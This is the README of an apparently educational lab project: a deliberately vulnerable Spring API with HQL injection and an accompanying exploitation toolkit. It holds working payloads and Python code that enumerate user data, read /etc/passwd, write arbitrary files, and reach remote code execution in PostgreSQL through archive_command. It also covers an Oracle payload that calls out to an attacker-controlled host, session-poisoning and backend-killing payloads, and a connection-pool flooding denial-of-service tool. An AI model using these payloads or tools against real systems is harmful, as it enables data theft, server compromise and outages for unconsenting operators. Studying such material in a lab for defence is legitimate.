This project demonstrates a REST API vulnerable to Hibernate Query Language (HQL) injection and includes a Python script that exploits the boolean oracle to enumerate user IDs and field values from the User1 entity. Much of this project was AI guided (thanks ChatGPT!), using an iterative approach to refine the code and the exploit script with the occasional tweak by me :).
- Java 8 or higher
- Maven
- Python 3.x
- Clone the repository (if not already done):

  ```shell
  git clone git@github.com:pdstat/hqli.git
  cd hqli
  ```

- Run the API:

  ```shell
  ./mvnw spring-boot:run
  ```

  Or, on Windows:

  ```shell
  .\mvnw.cmd spring-boot:run
  ```

  The API will start on http://localhost:8443.
The vulnerability is in `AgentRepository.checkValidAgent`:

```java
private static final String CHECK_AGENT_EXISTS =
        "select count(*) from com.pdstat.hqli.entity.User1 usr " +
        "where usr.userId = '%s' or usr.altUserId = '%s'";

String hql = String.format(CHECK_AGENT_EXISTS, agentCode, agentCode);
Long count = em.createQuery(hql, Long.class).getSingleResult();
```
- The user-controlled `agentCode` is interpolated directly into the HQL string without parameters.
- An attacker can inject quotes and boolean conditions to alter the WHERE clause.
- The API returns different responses based on whether any rows match:
  - If count > 0: the JSON status code is `"400"` with payload message `"Agent Already Registered"`.
  - If no rows match: the JSON status is `"401"` with an empty payload.
  - If the HQL breaks (syntax error): the exception text is returned in `message` with status `"401"`.
This behavior creates a boolean oracle suitable for blind HQLi: the attacker can craft expressions so the query returns rows when the guessed condition is true and none when false.
The Python script wraps boolean expressions in a tautology/falsity frame:

- Wrapper: `0' or (<EXPR>) or '1'='2`
- Exists helper: `exists ( from <Entity> u where <COND> )`
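The wrapper and oracle check can be driven from a few lines of Python. This is a minimal stdlib-only sketch (the real script uses `requests`); `URL` assumes a local instance of this app:

```python
import json
import urllib.parse
import urllib.request

URL = "http://localhost:8443/checkvalidagent"  # assumed local instance

def wrap(expr: str) -> str:
    """Frame a boolean expression in the tautology/falsity wrapper."""
    return f"0' or ({expr}) or '1'='2"

def oracle(expr: str) -> bool:
    """Return True when the injected condition matched at least one row
    (the API answers statusCode "400" / "Agent Already Registered")."""
    qs = urllib.parse.urlencode({"agentCode": wrap(expr)})
    with urllib.request.urlopen(f"{URL}?{qs}", timeout=10) as resp:
        body = json.load(resp)
    return body["msgInfo"]["statusCode"] == "400"

if __name__ == "__main__":
    entity = "com.pdstat.hqli.entity.User1"
    print(oracle(f"exists ( from {entity} u where 1=1 )"))  # true probe
    print(oracle(f"exists ( from {entity} u where 1=0 )"))  # false probe
```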
Given the repository query template:

```
select count(*) from com.pdstat.hqli.entity.User1 usr
where usr.userId = '%s' or usr.altUserId = '%s'
```

when the script sends an `agentCode` like `0' or (exists ( from com.pdstat.hqli.entity.User1 u where 1=1 )) or '1'='2`, the final HQL becomes:

```
select count(*) from com.pdstat.hqli.entity.User1 usr
where usr.userId = '0' or (exists ( from com.pdstat.hqli.entity.User1 u where 1=1 )) or '1'='2'
   or usr.altUserId = '0' or (exists ( from com.pdstat.hqli.entity.User1 u where 1=1 )) or '1'='2'
```

Below are representative payloads per phase (shown pre-URL-encoding; the client encodes automatically):
- Oracle probe (false):
  - Payload: `0' or (exists ( from com.pdstat.hqli.entity.User1 u where 1=0 )) or '1'='2`
  - Effect: no matches -> JSON statusCode `"401"`.
- Oracle probe (true):
  - Payload: `0' or (exists ( from com.pdstat.hqli.entity.User1 u where 1=1 )) or '1'='2`
  - Effect: matches -> JSON statusCode `"400"` with "Agent Already Registered".
- Phase 1: userId prefix guess (e.g., does any `userId` start with `60`?)
  - Payload: `0' or (exists ( from com.pdstat.hqli.entity.User1 u where u.userId like '60%' )) or '1'='2`
  - The final HQL inlines this payload twice (for both `userId` and `altUserId`) as shown above; any row starting with `60` yields `"400"`.
- Phase 2: field presence for a specific user (is `emailId` present for `60002650`?)
  - Payload: `0' or (exists ( from com.pdstat.hqli.entity.User1 u where u.userId = '60002650' and u.emailId is not null )) or '1'='2`
- Phase 2: field length lower bound (is `length(emailId) >= 5`?)
  - Payload: `0' or (exists ( from com.pdstat.hqli.entity.User1 u where u.userId = '60002650' and u.emailId is not null and length(u.emailId) >= 5 )) or '1'='2`
- Phase 3: field value prefix brute-force (does `emailId` start with `jo`?)
  - Payload: `0' or (exists ( from com.pdstat.hqli.entity.User1 u where u.userId = '60002650' and u.emailId like 'jo%' )) or '1'='2`
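The Phase 1 prefix walk can be sketched as a greedy loop. This is a simplification of what `hqli-all.py` does; the `matches` predicate would call the boolean oracle with the `exists`/`like` condition shown above:

```python
import string

ENTITY = "com.pdstat.hqli.entity.User1"  # target entity
CHARSET = string.digits                  # the seeded user IDs are numeric

def prefix_cond(prefix: str) -> str:
    """HQL condition asking: does any userId start with `prefix`?"""
    return f"exists ( from {ENTITY} u where u.userId like '{prefix}%' )"

def extract_one_id(matches, max_len: int = 12) -> str:
    """Greedily grow a prefix one character at a time.
    `matches(prefix)` is the boolean oracle, e.g.
    lambda p: oracle(prefix_cond(p)) against the live API."""
    value = ""
    while len(value) < max_len:
        for ch in CHARSET:
            if matches(value + ch):
                value += ch
                break
        else:
            break  # nothing extends the prefix: the ID is complete
    return value
```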
Note: The script safely doubles embedded quotes in guessed strings when needed (SQL-style ' -> ''), then the HTTP client URL-encodes the parameter.
Endpoint: GET /checkvalidagent?agentCode=...
Below are examples using PowerShell and curl. Replace the IDs to match users you created.
- User does not exist (oracle false case)

  PowerShell:

  ```powershell
  Invoke-RestMethod -Uri "http://localhost:8443/checkvalidagent?agentCode=00000000" -Method Get
  ```

  curl:

  ```shell
  curl -k "http://localhost:8443/checkvalidagent?agentCode=00000000"
  ```

  Expected JSON shape (no match):

  ```json
  {"payload":{},"msgInfo":{"statusCode":"401","msgStatus":"failure","message":null}}
  ```

- User exists (oracle true case)

  PowerShell:

  ```powershell
  Invoke-RestMethod -Uri "http://localhost:8443/checkvalidagent?agentCode=60002650" -Method Get
  ```

  curl:

  ```shell
  curl -k "http://localhost:8443/checkvalidagent?agentCode=60002650"
  ```

  Expected JSON shape (match):

  ```json
  {"payload":{"statusMsg":{"statusMsg":"Agent Already Registered","pageName":"NewUser"}},"msgInfo":{"statusCode":"400","msgStatus":"failure","message":"Failed to register user"}}
  ```

- Break the HQL with a single quote (syntax error)

  PowerShell:

  ```powershell
  Invoke-RestMethod -Uri "http://localhost:8443/checkvalidagent?agentCode=60002650'" -Method Get
  ```

  curl:

  ```shell
  curl -k "http://localhost:8443/checkvalidagent?agentCode=60002650'"
  ```

  The repository catches the exception and returns it in the JSON message with status "401".

- Fix/abuse the HQL with a tautology (injection)

  PowerShell:

  ```powershell
  Invoke-RestMethod -Uri "http://localhost:8443/checkvalidagent?agentCode=0'%20or%20'1'%3d'1" -Method Get
  ```

  curl:

  ```shell
  curl -k "http://localhost:8443/checkvalidagent?agentCode=0'%20or%20'1'%3d'1"
  ```

  This closes the quote and appends `or '1'='1'`, making the WHERE clause always true, so the API responds as if a user exists (status "400").
The database is seeded with 10 users, but you can add more via a handy create endpoint, using curl or PowerShell:

```shell
curl -k -X POST "http://localhost:8443/create" \
  -H "Content-Type: application/json" \
  -d '{
    "userId": "60002650",
    "altUserId": "ALT001",
    "dob": "1990-01-01",
    "password": "pass1234",
    "firstName": "John",
    "lastName": "Doe",
    "email": "john.doe@example.com"
  }'

curl -k -X POST "http://localhost:8443/create" \
  -H "Content-Type: application/json" \
  -d '{
    "userId": "60002925",
    "altUserId": "ALT002",
    "dob": "1992-02-02",
    "password": "pass5678",
    "firstName": "Jane",
    "lastName": "Doe",
    "email": "jane.doe@example.com"
  }'
```

```powershell
$body1 = '{"userId": "60002650", "altUserId": "ALT001", "dob": "1990-01-01", "password": "pass1234", "firstName": "John", "lastName": "Doe", "email": "john.doe@example.com"}'
Invoke-RestMethod -Uri "http://localhost:8443/create" -Method Post -Body $body1 -ContentType "application/json"

$body2 = '{"userId": "60002925", "altUserId": "ALT002", "dob": "1992-02-02", "password": "pass5678", "firstName": "Jane", "lastName": "Doe", "email": "jane.doe@example.com"}'
Invoke-RestMethod -Uri "http://localhost:8443/create" -Method Post -Body $body2 -ContentType "application/json"
```

After creating these users, you can run the Python script to enumerate them.
- Install Python dependencies: if your script requires any packages (e.g., `requests`), install them:

  ```shell
  pip install requests
  ```

- Run the script (basic):

  ```shell
  python .\hqli-all.py --entity com.pdstat.hqli.entity.User1 --fields .\fields.txt
  ```

  The script uses boolean-based HQLi to discover user IDs and brute-force selected properties.

- Optional: enable debug logging of requests:

  ```shell
  python .\hqli-all.py --entity com.pdstat.hqli.entity.User1 --fields .\fields.txt --debug
  ```

- Optional: ask AI to suggest additional likely fields (requires an OpenAI key):

  ```powershell
  $env:OPENAI_API_KEY = "<your key here>"
  python .\hqli-all.py --entity com.pdstat.hqli.entity.User1 --fields .\fields.txt --ai-mode --ai-field-count 15
  ```
The features of the enumeration script are listed below. Note that it has been developed very much in the context of this vulnerable API and is not currently generic enough to work against arbitrary HQLi targets without modification.
- `--entity <name>` (required): HQL entity to target, FQN or simple name (e.g., `com.pdstat.hqli.entity.User1`).
- `--fields <path>` (required): Path to a text wordlist of field names to try, one per line. Lines can contain commas/whitespace and `#` comments.
- `--entity-count <n>`: Number of user IDs to enumerate; default 2.
- `--debug`: Verbose request log line per probe.
- `--ai-mode`: Use OpenAI to suggest extra likely fields based on the entity name; requires `OPENAI_API_KEY` in the environment.
- `--ai-field-count <n>`: When `--ai-mode` is set, how many field names to fetch (default 10, clamped 1..50).
- `--id-field <name>`: Override the name of the identifier property (e.g., `userId`, `agentId`). If omitted, the script tries to discover it.
- `--resolve-entities`: Probe a wordlist of entity names and print those that are mapped.
- `--entities <path>`: Path to a text wordlist of entity names to try with `--resolve-entities`.
- `--count-rows`: Print total row count for `--entity` and exit.
- `--detect-db`: Detect database vendor and version via `function()` probes.
- `--proxy <url>`: Use an HTTP proxy (e.g., `http://<proxy_host>:<proxy_port>`).
Other tuning knobs inside the script:
- `URL`, `PROXY`, `VERIFY_TLS`, `HEADERS`: HTTP settings for the target endpoint.
- `ENTITYID_MAXLEN`, `ENTITYID_CHARSET`: Entity ID discovery parameters.
- `DEFAULT_MAXLEN`, `CHARSET`: Field value brute-force parameters.
- `SLEEP_BETWEEN`: Throttle between requests.
The script prints a total request counter at the end of a run to help understand traffic volume.
You can spin up the app against different databases using Docker:
- H2 (in-memory, default config):
  - Starts the app on http://localhost:8443
  - JPA `ddl-auto=create` ensures schema is created at startup

  ```shell
  docker compose up --build app-h2
  ```

- MySQL 8:
  - DB on localhost:3306, app on http://localhost:8443
  - App is configured via env vars to use MySQL and `ddl-auto=create`

  ```shell
  docker compose up --build mysql app-mysql
  ```

- PostgreSQL 16:
  - DB on localhost:55432 (mapped to container 5432), app on http://localhost:8443
  - App is configured via env vars to use PostgreSQL and `ddl-auto=create`

  ```shell
  docker compose up --build postgres app-postgres
  ```

- MariaDB 11:
  - DB on localhost:3307, app on http://localhost:8443

  ```shell
  docker compose up --build mariadb app-mariadb
  ```

- SQL Server 2022:
  - DB on localhost:1433, app on http://localhost:8443
  - Default SA password is set (`SA_PASSWORD=Str0ngPwd!`); app user hqli/hqli is created by init.sql

  ```shell
  docker compose up --build mssql mssql-init app-mssql
  ```

- Oracle XE 21c:
  - DB on localhost:11521 (container 1521), app on http://localhost:8443
  - App user HQLI/hqli configured via env vars

  ```shell
  docker compose up --build oracle app-oracle
  ```

- HSQLDB (embedded file database):
  - App uses a mounted volume with the DB files; app on http://localhost:8443

  ```shell
  docker compose up --build app-hsqldb
  ```

- Apache Derby (embedded file database):
  - App uses a mounted volume with the DB files; app on http://localhost:8443

  ```shell
  docker compose up --build app-derby
  ```

- SQLite (file database):
  - Sidecar creates a volume with /data/hqli.db; app on http://localhost:8443

  ```shell
  docker compose up --build sqlite app-sqlite
  ```

Stop everything with:

```shell
docker compose down -v
```

Thanks to HQL's function() support, you can also try to detect the database vendor and version (see the `--detect-db` flag), and potentially exploit further via SQL functions. Here are some examples I've discovered across the different DBs supported by this project:
Note: a number of these examples assume that the database user has sufficient privileges to execute the functions, which, as we know, can sometimes be the case in misconfigured systems.
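For instance, `--detect-db`-style fingerprinting can lean on vendor-specific functions. The probes below are illustrative, not the script's actual probe list: `connection_id()` exists on MySQL/MariaDB and `pg_backend_pid()` on PostgreSQL, so only the matching vendor's probe parses and evaluates true:

```python
# Illustrative vendor fingerprints: each probe calls a function that exists
# on only one vendor, so only that vendor's probe evaluates true (the others
# fail to resolve and come back as a "401" with an exception message).
VENDOR_PROBES = {
    "mysql":    "x' or function('connection_id') > 0 or '1'='2",
    "postgres": "x' or function('pg_backend_pid') > 0 or '1'='2",
}

def detect_db(oracle) -> str:
    """`oracle(payload)` returns True only when the probe parsed and matched."""
    for vendor, payload in VENDOR_PROBES.items():
        if oracle(payload):
            return vendor
    return "unknown"
```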
You can read files from the filesystem using the load_file function. For example, to read the /etc/passwd file character by character, you can use the following payloads:

True (char at position 1 is 'r'):

```
x' or function('substring', function('load_file','/etc/passwd'), 1, 1) = 'r' or '1'='2
```

True (char at position 2 is 'o'):

```
x' or function('substring', function('load_file','/etc/passwd'), 2, 1) = 'o' or '1'='2
```

True (char at position 3 is 'o'):

```
x' or function('substring', function('load_file','/etc/passwd'), 3, 1) = 'o' or '1'='2
```

True (char at position 4 is 't'):

```
x' or function('substring', function('load_file','/etc/passwd'), 4, 1) = 't' or '1'='2
```

etc.
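The per-character probes above mechanize naturally. A sketch of the loop, with an assumed printable charset for /etc/passwd (note: MySQL's default collation is case-insensitive, so a serious extractor would use a binary comparison to distinguish case):

```python
import string

# Assumed charset for typical /etc/passwd content.
PRINTABLE = string.ascii_letters + string.digits + " :/,-_.\n"

def char_probe(pos: int, ch: str) -> str:
    """Payload testing whether character `pos` (1-based) of the file is `ch`."""
    esc = ch.replace("'", "''")  # SQL-style quote doubling
    return (f"x' or function('substring', function('load_file','/etc/passwd'),"
            f" {pos}, 1) = '{esc}' or '1'='2")

def read_file(oracle, max_chars: int = 200) -> str:
    """Recover the file one character at a time; `oracle(payload)` returns
    True on the "400" (row matched) response."""
    out = []
    for pos in range(1, max_chars + 1):
        for ch in PRINTABLE:
            if oracle(char_probe(pos, ch)):
                out.append(ch)
                break
        else:
            break  # no candidate matched: end of file or unknown character
    return "".join(out)
```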
Note the MySQL user has to be granted the FILE privilege to read files outside of the MySQL data directory. In this project the hqli user is granted this privilege in the docker/mysql/init.sql file. The --secure-file-priv= option in the docker-compose.yml file disables the secure file privilege restriction, allowing reading files from anywhere the MySQL server user has access to.
You can also use the sleep function to cause a delay in the response, which could be used for a denial of service attack. For example, to sleep for 10 seconds, you can use the following payload:

```
x' or (function('sleep',10)=0) or '1'='2
```
Sending this continuously will flood the JDBC connection pool and cause a denial of service. See the flood.py script for an example of how to do this.
Similar to how this project's script exfiltrates data via boolean HQLi, you can also read files from the filesystem using the pg_read_file function. For example, to read the /etc/passwd file, you can use the following payloads:
True (char at position 1 is 'r'):

```
x' or function('substring', function('pg_read_file','/etc/passwd'), 1, 1) = 'r' or '1'='2
```

True (char at position 2 is 'o'):

```
x' or function('substring', function('pg_read_file','/etc/passwd'), 2, 1) = 'o' or '1'='2
```

True (char at position 3 is 'o'):

```
x' or function('substring', function('pg_read_file','/etc/passwd'), 3, 1) = 'o' or '1'='2
```

True (char at position 4 is 't'):

```
x' or function('substring', function('pg_read_file','/etc/passwd'), 4, 1) = 't' or '1'='2
```

etc.
In PostgreSQL you can write files to the filesystem using the lo_export function, which exports a large object to a file.
To export a large object into an operating system file, call:

```c
int lo_export(PGconn *conn, Oid lobjId, const char *filename);
```
The lobjId argument specifies the OID of the large object to export and the filename argument specifies the operating system name of the file. Note that the file is written by the client interface library, not by the server. Returns 1 on success, -1 on failure.
These two functions read and write files in the server's file system, using the permissions of the database's owning user. Therefore, by default their use is restricted to superusers. In contrast, the client-side import and export functions read and write files in the client's file system, using the permissions of the client program.
In the case of this project the PostgreSQL JDBC driver is configured with the same credentials as the database user configured in the docker-compose.yml file, which is the hqli user. So any files written to the filesystem will be written to the PostgreSQL server's filesystem.
These objects exist in the pg_largeobject table. From the function signature above we would need to know the OID of the large object we want to export.
However, it seems it's possible to create a large object from a string using the lo_from_bytea function and then stuff its OID into a Grand Unified Configuration (GUC) variable.
For example, the following payload:

```
x' OR function('set_config','attk.loid',function('concat', function('lo_from_bytea', 0, function('decode','aGVsbG8K','base64')), ''),false) IS NOT NULL OR '1'='2
```

creates a GUC variable called `attk.loid` holding the OID of a large object containing the string "hello\n".
And then the export:

```
x' OR function('lo_export',function('int4', function('current_setting','attk.loid')),'/tmp/dump.bin') >= 0 OR '1'='2
```

will write the contents of the large object to a file called /tmp/dump.bin on the filesystem of the PostgreSQL server.
This shows that we have the ability to write arbitrary files to the filesystem in directories that the PostgreSQL server has write access to.
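The stash-then-export pair generalizes to arbitrary bytes and target paths. A sketch of the two payload builders (strings only, nothing is sent; `attk.loid` is the GUC name used above):

```python
import base64

def stash_lo_payload(data: bytes, guc: str = "attk.loid") -> str:
    """Create a large object holding `data` and stash its OID in a GUC."""
    b64 = base64.b64encode(data).decode()
    return ("x' OR function('set_config','" + guc + "',"
            "function('concat', function('lo_from_bytea', 0,"
            f" function('decode','{b64}','base64')), ''),false)"
            " IS NOT NULL OR '1'='2")

def export_lo_payload(path: str, guc: str = "attk.loid") -> str:
    """Export the stashed large object to `path` on the DB server's filesystem."""
    return ("x' OR function('lo_export',function('int4',"
            f" function('current_setting','{guc}')),'{path}') >= 0 OR '1'='2")
```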
This took me down another rabbit hole! It seems that, from this, RCE can be achieved. (Note: this example assumes `archive_mode` is enabled in PostgreSQL, which it is in the Docker Compose config for PostgreSQL in this project.)
- Create a large object containing a base64-encoded script (`#!/usr/bin/bash\nid > /tmp/pwned\n`):

  ```
  x' OR function('set_config','attk.loid',function('concat',function('lo_from_bytea',0,function('decode','IyEvdXNyL2Jpbi9iYXNoCmlkID4gL3RtcC9wd25lZAo=','base64')), ''), false) IS NOT NULL OR '1'='2
  ```

- Write the large object to a file called /tmp/p.sh:

  ```
  x' OR function('lo_export',function('int4', function('current_setting','attk.loid')),'/tmp/p.sh') >= 0 OR '1'='2
  ```

- Store a new `archive_command` in a GUC variable (`archive_command = 'bash /tmp/p.sh %p %f'\n`):

  ```
  x' OR function('set_config','attk.loid',function('concat',function('lo_from_bytea',0,function('decode','YXJjaGl2ZV9jb21tYW5kID0gJ2Jhc2ggL3RtcC9wLnNoICVwICVmJwo=','base64')), ''), false) IS NOT NULL OR '1'='2
  ```

- Read the LO OID from the session GUC, cast it to an int, and use lo_export to overwrite $PGDATA/postgresql.auto.conf:

  ```
  x' OR function('lo_export',function('int4', function('current_setting','attk.loid')),function('concat', function('current_setting','data_directory'), '/postgresql.auto.conf')) >= 0 OR '1'='2
  ```

- Reload the config:

  ```
  x' OR function('pg_reload_conf') = true OR '1'='2
  ```

- Trigger a WAL segment switch to execute the archive command:

  ```
  x' OR function('pg_switch_wal') IS NOT NULL OR '1'='2
  ```
We could also send a truthy payload to check for the existence of the /tmp/pwned file, to confirm the RCE worked:

```
x' OR function('length', function('pg_read_file','/tmp/pwned')) > 0 OR '1'='2
```
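The six steps above can be packaged as an ordered payload list. This is a sketch (send each string through the agentCode parameter in order); the base64 values are computed from the script and archive_command inputs:

```python
import base64

def rce_chain(script: str, archive_cmd: str) -> list[str]:
    """Ordered payloads reproducing the archive_command RCE chain."""
    def stash(data: bytes) -> str:
        b64 = base64.b64encode(data).decode()
        return ("x' OR function('set_config','attk.loid',"
                "function('concat',function('lo_from_bytea',0,"
                f"function('decode','{b64}','base64')), ''), false)"
                " IS NOT NULL OR '1'='2")
    def export(dest: str) -> str:
        return ("x' OR function('lo_export',function('int4',"
                f" function('current_setting','attk.loid')),{dest})"
                " >= 0 OR '1'='2")
    return [
        stash(script.encode()),                                  # 1. LO with shell script
        export("'/tmp/p.sh'"),                                   # 2. write it to /tmp/p.sh
        stash(f"archive_command = '{archive_cmd}'\n".encode()),  # 3. LO with new config line
        export("function('concat', function('current_setting','data_directory'),"
               " '/postgresql.auto.conf')"),                     # 4. overwrite postgresql.auto.conf
        "x' OR function('pg_reload_conf') = true OR '1'='2",     # 5. reload config
        "x' OR function('pg_switch_wal') IS NOT NULL OR '1'='2", # 6. force WAL archiving
    ]
```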
PostgreSQL has the pg_sleep function to cause a delay in the response, which could be used for a denial of service attack. For example, to sleep for 10 seconds, you can use the following payload:

```
x' or (function('pg_sleep',10)=0) or '1'='2
```
Sending this continuously will flood the JDBC connection pool and cause a denial of service. See the flood.py script for an example of how to do this.
Thanks to AI, I discovered the existence of a PostgreSQL property called search_path, which led to some interesting attack vectors affecting both integrity and availability.
The PostgreSQL documentation has this to say about search_path:
5.10.3. The Schema Search Path Qualified names are tedious to write, and it's often best not to wire a particular schema name into applications anyway. Therefore tables are often referred to by unqualified names, which consist of just the table name. The system determines which table is meant by following a search path, which is a list of schemas to look in. The first matching table in the search path is taken to be the one wanted. If there is no match in the search path, an error is reported, even if matching table names exist in other schemas in the database.
The ability to create like-named objects in different schemas complicates writing a query that references precisely the same objects every time. It also opens up the potential for users to change the behavior of other users' queries, maliciously or accidentally. Due to the prevalence of unqualified names in queries and their use in PostgreSQL internals, adding a schema to search_path effectively trusts all users having CREATE privilege on that schema. When you run an ordinary query, a malicious user able to create objects in a schema of your search path can take control and execute arbitrary SQL functions as though you executed them.
The usual way to set the parameter is with a SQL SET command. Here's another snippet from the PostgreSQL docs:

```sql
SET search_path TO myschema;
```

Then we no longer have access to the public schema without explicit qualification.
However, the function() support in HQL allows us to call the set_config function, which can be used to set the search_path parameter. The function signature is as follows:
```
set_config(setting_name text, new_value text, is_local boolean) returns text
```
Taking a step back for a minute: using the checkvalidagent endpoint in this project with a user that exists, a request to http://127.0.0.1:8443/checkvalidagent?agentCode=60002650 returns:

```json
{
  "payload": {
    "statusMsg": {
      "statusMsg": "Agent Already Registered",
      "pageName": "NewUser"
    }
  },
  "msgInfo": {
    "message": "Failed to register user",
    "msgStatus": "failure",
    "statusCode": "400"
  }
}
```

As an attacker we can use function('set_config',...) to set the search_path to a non-existent schema, which will cause the query to fail with an error indicating that the users relation does not exist. This is because the users table is in the public schema by default, and by changing the search_path we are effectively hiding it from the query. E.g. a request to http://127.0.0.1:8443/checkvalidagent?agentCode=0'+OR+function('set_config','search_path','attk',+false)+=+'attk'+OR+'1'='2 will break all further requests for this session (the session being the connection to the database, which is reused by the application). Re-requesting http://127.0.0.1:8443/checkvalidagent?agentCode=60002650 now returns:
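A minimal end-to-end reproduction of the poisoning, stdlib only (assumes the PostgreSQL compose setup from above is running locally):

```python
import urllib.parse
import urllib.request

URL = "http://127.0.0.1:8443/checkvalidagent"

# set_config(..., false) makes the change session-wide, so it sticks to the
# pooled JDBC connection and outlives this one request.
POISON = "0' OR function('set_config','search_path','attk', false) = 'attk' OR '1'='2"

def probe(agent_code: str) -> str:
    """Send one agentCode and return the raw JSON response body."""
    qs = urllib.parse.urlencode({"agentCode": agent_code})
    with urllib.request.urlopen(f"{URL}?{qs}", timeout=10) as resp:
        return resp.read().decode()

if __name__ == "__main__":
    print(probe("60002650"))  # healthy "400" response
    probe(POISON)             # hide the public schema for this connection
    print(probe("60002650"))  # now fails: relation "users" does not exist
```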
```json
{
  "payload": {
    "statusMsg": null
  },
  "msgInfo": {
    "message": "org.hibernate.exception.SQLGrammarException: JDBC exception executing SQL [select count(*) from users u1_0 where u1_0.user_id='60002650' or u1_0.alt_user_id='60002650'] [ERROR: relation \"users\" does not exist\n Position: 22] [n/a]",
    "msgStatus": "failure",
    "statusCode": "401"
  }
}
```

Woops!
To kill a PostgreSQL backend process, you can use the pg_terminate_backend function. This function requires the process ID (PID) of the backend you want to terminate. Here's an example of how to use it:

```sql
SELECT pg_terminate_backend(<pid>);
```

You can find the PID of a backend process by querying the pg_stat_activity view:

```sql
SELECT pid, usename, application_name, client_addr, state
FROM pg_stat_activity;
```

I tested this out by first using the psql command line tool to connect to the PostgreSQL database via the terminal of the running Docker container. Then I ran the following query to find some active connections:

```sql
SELECT pid, usename, application_name
FROM pg_stat_activity;
```

The process with PID 990 was my connection from psql. I could terminate this connection by sending the following payload to the vulnerable application:

```
x' or function('pg_terminate_backend', 990) = true or '1'='2
```

From the terminal I then tried to re-run the query and saw that my connection had been terminated.

It would be quite simple to continuously fuzz PIDs and create a permanent denial of service condition on the database server.

Note the docs have the following to say about this function:
You can execute this against another backend that has exactly the same role as the user calling the function. In all other cases, you must be a superuser.
This worked for me as I connected to the database as the hqli user and the backend processes were also running as hqli.
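That PID sweep can be sketched in a few lines; `send` is assumed to be a callable that issues the HTTP request with the payload in agentCode (misses are harmless false results, hits each kill one database session):

```python
def terminate_payload(pid: int) -> str:
    """Payload asking the server to terminate backend `pid`."""
    return f"x' or function('pg_terminate_backend', {pid}) = true or '1'='2"

def fuzz_pids(send, start: int = 1, stop: int = 5000) -> None:
    """Sweep a plausible PID range via the injection point."""
    for pid in range(start, stop):
        send(terminate_payload(pid))
```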
This was another case where the right conditions need to be in place for an attacker to exploit the vulnerability. By default the Oracle docker container did not have the correct ACLs to allow outbound HTTP requests; for demonstration purposes I've obviously configured that.

With that in mind, a payload such as the following can make outbound HTTP requests to an attacker-controlled server:

```
0' or (function('LENGTH',function('UTL_HTTP.REQUEST','http://onfdv7d614cf08kpkqhcvxgxgomga6yv.oastify.com:80/'))>0) or '1'='2
```
Hits in Burp Collaborator:
In the context of this injection for MSSQL we can't use the WAITFOR DELAY command directly as it results in a syntax error.
However, we can use expensive string-based operations to cause a delay in the response, which could be used for a denial of service attack. For example, to cause a delay, you can use the following payload:

```
0' or function('DATALENGTH', function('REPLICATE', function('CONCAT', function('NEWID'), function('REPLICATE','A',4000), function('REPLICATE','B',4000), function('REPLICATE','C',4000), function('REPLICATE','D',4000)), 50000))>0 or '1'='2
```

This takes 11+ seconds for a single response to return. The flood.py script can be used to continuously send this payload to the server, which will flood the JDBC connection pool and cause a denial of service.
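To confirm the slowdown, it's enough to time the expensive payload against a benign one. A small sketch (`send` is assumed to perform the HTTP request; the threshold is an arbitrary choice, not a measured constant):

```python
import time

def timed_probe(send, payload: str) -> float:
    """Elapsed wall-clock seconds for one probe via `send(payload)`."""
    start = time.monotonic()
    send(payload)
    return time.monotonic() - start

def looks_delayed(send, heavy: str, light: str = "00000000",
                  threshold: float = 5.0) -> bool:
    """Heuristic: the expensive payload should take much longer than a benign one."""
    return timed_probe(send, heavy) - timed_probe(send, light) > threshold
```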
The flood.py script can be used to continuously send a payload to the vulnerable endpoint, which will flood the JDBC connection pool and cause a denial of service. I hadn't intended to develop this initially, but I needed a way of testing the availability attack vectors, so I whipped this up quickly. Feature flags are:
- `--url`: Base URL (defaults per target), e.g. http://127.0.0.1:8443
- `--concurrency`: Max simultaneous open connections (default 200)
- `--interval`: Delay between scheduling requests (seconds, default 0.0)
- `--sleep`: DB sleep seconds inside injected payload (if supported by chosen DB, default 10)
- `--db`: Target DB type to tailor sleep function (default: mysql)
  - Supported values: `mysql`, `postgres`, `mssql`, `oracle`, `h2`, `hsqldb`
- `--connect-timeout`: TCP connect timeout (default 3.0)
- `--write-timeout`: Write/drain timeout (default 3.0)
- `--linger`: Optional delay after sending before closing (default 0.0)
- `--progress`: Print per-second progress
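The idea behind flood.py can be sketched with the standard library alone. This is a simplification, not the script's actual implementation: it assumes the MySQL target (so the `sleep()` payload applies) and plain HTTP, and it simply opens many connections that each park a pooled DB session in a sleep:

```python
import socket
import urllib.parse

def raw_request(host: str, port: int, payload: str) -> bytes:
    """Bare HTTP/1.1 GET for the vulnerable endpoint."""
    qs = urllib.parse.urlencode({"agentCode": payload})
    return (f"GET /checkvalidagent?{qs} HTTP/1.1\r\n"
            f"Host: {host}:{port}\r\nConnection: keep-alive\r\n\r\n").encode()

def flood(host: str = "127.0.0.1", port: int = 8443,
          concurrency: int = 200, sleep_s: int = 10) -> list:
    """Open `concurrency` connections, each carrying a sleepy payload."""
    payload = f"x' or (function('sleep',{sleep_s})=0) or '1'='2"
    socks = []
    for _ in range(concurrency):
        s = socket.create_connection((host, port), timeout=3.0)
        s.sendall(raw_request(host, port, payload))
        socks.append(s)  # never read the response; keep the pool busy
    return socks
```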
Disclaimer: This project is for educational and testing purposes only. Do not use on systems without proper authorization.




